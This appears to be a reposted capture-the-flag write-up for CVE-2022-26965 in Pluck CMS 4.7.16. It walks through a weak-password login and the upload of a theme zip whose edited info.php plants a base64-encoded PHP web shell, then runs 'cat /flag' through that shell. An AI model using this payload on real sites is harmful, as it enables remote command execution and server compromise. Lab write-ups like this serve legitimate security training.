0
0

春秋云境:CVE-2022-26965

春秋云境:CVE-2022-26965

文章合集:春秋云境系列靶场记录(合集)

Pluck-CMS-Pluck-4.7.16 后台RCE:CVE-2022-26965

在这里插入图片描述

漏洞介绍

Pluck-CMS-Pluck-4.7.16 后台RCE

解题步骤

  1. 过弱口令登录:admin在这里插入图片描述在这里插入图片描述
  2. 登录之后按照图中位置进行主题安装在这里插入图片描述在这里插入图片描述
  3. 按照这位大哥文章:https://blog.csdn.net/weixin_39639260/article/details/116105945中说的,需要将主题中的info.php文件修改,再打包成zip再上传,通过网络搜索找到Github中的Pluck CMS,进入后随便下载任一主题:在这里插入图片描述
  4. 对主题进行解压得到info.php,修改info.php文件内容,并重新打包成zip文件:
<?php

file_put_contents('testshell.php',base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWzFdKTs/Pg=='));

?>

在这里插入图片描述

  1. 将刚才打包的zip主题进行上传在这里插入图片描述
  2. 访问根目录下的testshell.php并进行命令执行:http://eci-jbxi1zebqg9.cloudeci1.ichunqiu.com/testshell.php?1=cat%20/flag![在这里插入图片描述](https://img-blog.csdnimg.cn/f510c73bb7c849fa87904a4e33d5d65e.png)

文章合集:春秋云境系列靶场记录(合集)

标签: 安全 系统安全 安全漏洞
本文转载自: https://blog.csdn.net/laobanjiull/article/details/128106473
版权归原作者 Acczdy 所有, 如有侵权,请联系我们删除。
登录后发布评论

“春秋云境:CVE-2022-26965”的评论:

还没有评论
关于作者
...
overfit同步小助手
文章同步
相关阅读

Ovis: 多模态大语言模型的结构化嵌入对齐

快速搭建SpringBoot3+Prometheus+Grafana

【LLaMA-Factory】【Windows】:在windows操作系统配置大模型微调框架LLaMA-Factory

智能体时代:重塑人机交互的未来

【ChatGPT】编写结构化 Prompt 的技巧

Oracle CONNECT BY、PRIOR和START WITH关键字详解

ChatGPT实现旅游推荐微信小程序

文章导航